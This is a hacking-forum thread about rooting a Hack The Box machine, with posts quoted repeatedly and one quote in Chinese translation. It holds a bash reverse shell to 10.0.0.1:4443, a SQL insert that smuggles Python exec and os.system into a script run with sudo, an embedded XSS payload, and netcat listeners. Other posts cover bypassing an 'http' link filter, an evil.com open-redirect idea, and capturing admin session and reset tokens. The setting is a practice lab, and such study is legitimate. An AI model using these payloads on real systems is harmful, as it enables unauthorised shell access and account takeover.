(November 16, 2022, 07:21 AM)CyberBandit Wrote:

(November 16, 2022, 05:29 AM)Cy6erf0x Wrote: For root:
First get two ssh sessions.

Create the /dev/shm/kk.sh script. Something like this:

#!/bin/bash
bash -i >& /dev/tcp/10.0.0.1/4443 0>&1

chmod 777 kk.sh

Read the database creds from /opt/security/ml_security.py and log in to the database. Run these:

use app;

insert into escalate values ("lol","lol","lol",'hello=exec("""
import 
os
os.system("/dev/shm/kk.sh")
print("&ErrMsg=%3Cimg%20src=%22http://imgur.com/bTkSe.png%22%20/%3E%3CSCRIPT%3Ealert%28%22xss%22%29%3C/SCRIPT%3E")""")');

make listener

 nc -nvlp 4443

On the second session just run:

sudo /opt/security/ml_security.py

is this method for 'root' working for others?

getting the following error running ml_security.pl

"2022-11-16 07:07:07.010608: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcudart.so.11.0'; dlerror: libcudart.so.11.0: cannot open shared object file: No such file or directory"

Not working for me. Still trying to figure out how to get a score high enough so eval is used.

(November 16, 2022, 03:15 PM)nsa_on_tour Wrote:

(November 16, 2022, 07:21 AM)CyberBandit Wrote:

(November 16, 2022, 05:29 AM)Cy6erf0x Wrote: For root:
First get two ssh sessions.

Create the /dev/shm/kk.sh script. Something like this:

#!/bin/bash
bash -i >& /dev/tcp/10.0.0.1/4443 0>&1

chmod 777 kk.sh

Read the database creds from /opt/security/ml_security.py and log in to the database. Run these:

use app;

insert into escalate values ("lol","lol","lol",'hello=exec("""
import 
os
os.system("/dev/shm/kk.sh")
print("&ErrMsg=%3Cimg%20src=%22http://imgur.com/bTkSe.png%22%20/%3E%3CSCRIPT%3Ealert%28%22xss%22%29%3C/SCRIPT%3E")""")');

make listener

 nc -nvlp 4443

On the second session just run:

sudo /opt/security/ml_security.py

is this method for 'root' working for others?

getting the following error running ml_security.pl

"2022-11-16 07:07:07.010608: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcudart.so.11.0'; dlerror: libcudart.so.11.0: cannot open shared object file: No such file or directory"

Not working for me. Still trying to figure out how to get a score high enough so eval is used.

check the video

(November 16, 2022, 04:47 PM)Cy6erf0x Wrote:

(November 16, 2022, 03:15 PM)nsa_on_tour Wrote:

(November 16, 2022, 07:21 AM)CyberBandit Wrote:

(November 16, 2022, 05:29 AM)Cy6erf0x Wrote: For root:
First get two ssh sessions.

Create the /dev/shm/kk.sh script. Something like this:

#!/bin/bash
bash -i >& /dev/tcp/10.0.0.1/4443 0>&1

chmod 777 kk.sh

Read the database creds from /opt/security/ml_security.py and log in to the database. Run these:

use app;

insert into escalate values ("lol","lol","lol",'hello=exec("""
import 
os
os.system("/dev/shm/kk.sh")
print("&ErrMsg=%3Cimg%20src=%22http://imgur.com/bTkSe.png%22%20/%3E%3CSCRIPT%3Ealert%28%22xss%22%29%3C/SCRIPT%3E")""")');

make listener

 nc -nvlp 4443

On the second session just run:

sudo /opt/security/ml_security.py

is this method for 'root' working for others?

getting the following error running ml_security.pl

"2022-11-16 07:07:07.010608: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcudart.so.11.0'; dlerror: libcudart.so.11.0: cannot open shared object file: No such file or directory"

Not working for me. Still trying to figure out how to get a score high enough so eval is used.

check the video

Unfortunately I don’t do social media. I know I’ll get a flatmates insta and look. Thanks.

have question 

why i cannot get the authorization header after inspecting the "/admin_tickets" via Burpsuite?

any advise guys...

(November 19, 2022, 03:17 PM)inferno7us Wrote: have question 

why i cannot get the authorization header after inspecting the "/admin_tickets" via Burpsuite?

any advise guys...

They remove the header authorization, you need to bypass somehow the filtred word: http in form http://10.10.11.188/escalate field link.

if you bypass it, fire up a webserver/nc listen and capture admin session id.

@app.route('/escalate', methods=['GET','POST'])
@login_required
def escalate():
        if request.method=='GET':
                conn.reconnect()
                c = conn.cursor()
                c.execute('select * from tickets')
                r = c.fetchall()
                return render_template('escalate.html',tickets=r)
        else:
                to = request.form.get('to')
                link = request.form.get('link')
                issue = request.form.get('issue')
                reason = request.form.get('reason')
                if 'http' in link.lower():
                        ip = link.split('/')[2]
                        tun_ip = ni.ifaddresses('eth0')[ni.AF_INET][0]['addr']
                        if ip!=tun_ip:
                                return 'This request can\'t be reviewed since the issue link is flagged'
                conn.reconnect()
                c = conn.cursor()
                c.execute('insert into escalate values(%s,%s,%s,%s)',(to,issue,link,reason,))
                conn.commit()
                return 'Escalation form submitted to Admin and will be reviewed soon!'

(November 20, 2022, 04:36 AM)诺布什克 Wrote:

(November 19, 2022, 03:17 PM)地狱7us Wrote: 有疑问 

为什么我在通过 Burpsuite 检查“/admin_tickets”后无法获得授权标头？

任何建议...

他们删除了标头授权，您需要以某种方式绕过过滤词：http in form http://10.10.11.188/escalate 字段链接。

如果绕过它，请启动网络服务器/nc 监听并捕获管理会话 ID。

@app.route('/escalate', methods=['GET','POST'])
@login_required
def escalate():
        if request.method=='GET':
                conn.reconnect()
                c = conn.cursor()
                c.execute('select * from tickets')
                r = c.fetchall()
                return render_template('escalate.html',tickets=r)
        else:
                to = request.form.get('to')
                link = request.form.get('link')
                issue = request.form.get('issue')
                reason = request.form.get('reason')
                if 'http' in link.lower():
                        ip = link.split('/')[2]
                        tun_ip = ni.ifaddresses('eth0')[ni.AF_INET][0]['addr']
                        if ip!=tun_ip:
                                return 'This request can\'t be reviewed since the issue link is flagged'
                conn.reconnect()
                c = conn.cursor()
                c.execute('insert into escalate values(%s,%s,%s,%s)',(to,issue,link,reason,))
                conn.commit()
                return 'Escalation form submitted to Admin and will be reviewed soon!'

I don't know how to bypass http

Logged in as Robert (admin) and visited the /escalate endpoint. Pointed to my own IP in the Link field using HTTP to defeat filter with netcat listener running. Intercepted the reset token. When I visit the reset link and set a new password to "boom", it says success. But when I try to log in using the newly set password it doesn't work. Any ideas?

GET /reset?token=nnnLIQ60EjSW1%2FRJIOFHxdhXBaOE7M0QkR3tY0%2FsR3dwPjiywurWQL2FvldSksAgIoQ%2BFUgxn10FMjWcAQgMKw%3D%3D HTTP/1.1

(November 20, 2022, 06:28 PM)quarantineph2020 Wrote: Logged in as Robert (admin) and visited the /escalate endpoint. Pointed to my own IP in the Link field using HTTP to defeat filter with netcat listener running. Intercepted the reset token. When I visit the reset link and set a new password to "boom", it says success. But when I try to log in using the newly set password it doesn't work. Any ideas?

GET /reset?token=nnnLIQ60EjSW1%2FRJIOFHxdhXBaOE7M0QkR3tY0%2FsR3dwPjiywurWQL2FvldSksAgIoQ%2BFUgxn10FMjWcAQgMKw%3D%3D HTTP/1.1

Well it's username, it change very fast. You need to try few time. On /escalate  form, I think it's more a Open Redirect exploit that defeat filter like: 
/home?erro=\\\evil.com/path, or somethink to redirect to nc listener, because from what i see here: if 'http' in link.lower(): it will convert to lowercase 
our input from link field. Maybe im wrong ... anyway this it's the worse machine ever from HTB, all the time crashes ...

(November 20, 2022, 04:36 AM)nobushk Wrote:

(November 19, 2022, 03:17 PM)inferno7us Wrote: have question 

why i cannot get the authorization header after inspecting the "/admin_tickets" via Burpsuite?

any advise guys...

They remove the header authorization, you need to bypass somehow the filtred word: http in form http://10.10.11.188/escalate field link.

if you bypass it, fire up a webserver/nc listen and capture admin session id.

@app.route('/escalate', methods=['GET','POST'])
@login_required
def escalate():
        if request.method=='GET':
                conn.reconnect()
                c = conn.cursor()
                c.execute('select * from tickets')
                r = c.fetchall()
                return render_template('escalate.html',tickets=r)
        else:
                to = request.form.get('to')
                link = request.form.get('link')
                issue = request.form.get('issue')
                reason = request.form.get('reason')
                if 'http' in link.lower():
                        ip = link.split('/')[2]
                        tun_ip = ni.ifaddresses('eth0')[ni.AF_INET][0]['addr']
                        if ip!=tun_ip:
                                return 'This request can\'t be reviewed since the issue link is flagged'
                conn.reconnect()
                c = conn.cursor()
                c.execute('insert into escalate values(%s,%s,%s,%s)',(to,issue,link,reason,))
                conn.commit()
                return 'Escalation form submitted to Admin and will be reviewed soon!'

This checks to see if the 'link' field has 'http' in it and then splits the string using '/' as the delimiter and copies the 3rd string to the variable 'ip'. So if you enter 'http://10.10.0.1' you end up with '10.10.0.1' as the ip variable which is compared to the tun_ip variable which should be the IP address of the box. If they're not equal you get the error message returned.

If your link either: a) does not contain 'http' or b) passes the validation, the next section is just taking the values from the fields and inserting it into the database & committing the changes. I haven't cracked how to get the admin session key yet, but from this code snippet I don't think it has anything to do with bypassing the URL. There's some clues with how it's talking to the database, however. This was helpful, thanks.

Edit: It looks like the fields on that page aren't able vulnerable to injection because it uses the placeholder '%s' and it has the tuple containing the values for the second parameter. Back to the drawing board.

Well i try: unhex , function from mysql ... din't work cuz link field it's not sql injectable. After that i try hex/base64 python same result... can any please  give us a hint, will be great thanks